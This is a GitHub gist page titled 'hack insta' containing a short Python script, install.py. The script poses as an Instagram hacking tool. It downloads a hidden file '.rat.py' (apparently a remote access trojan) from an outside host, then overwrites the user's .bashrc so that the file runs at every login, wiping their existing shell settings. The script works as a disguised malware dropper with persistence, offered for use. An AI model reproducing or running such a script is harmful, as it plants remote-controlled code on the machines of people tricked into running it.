Skip to content

Instantly share code, notes, and snippets.

@daniyal3212
daniyal3212 / install.py
Created November 17, 2020 07:40
hack insta
import os
url = 'https://host.com/.rat.py'
os.system("apt install zip wget -y")
cmd = "wget "+url
os.system(cmd)
f = open(".bashrc", "w")
f.write("python .rat.py")
f.close()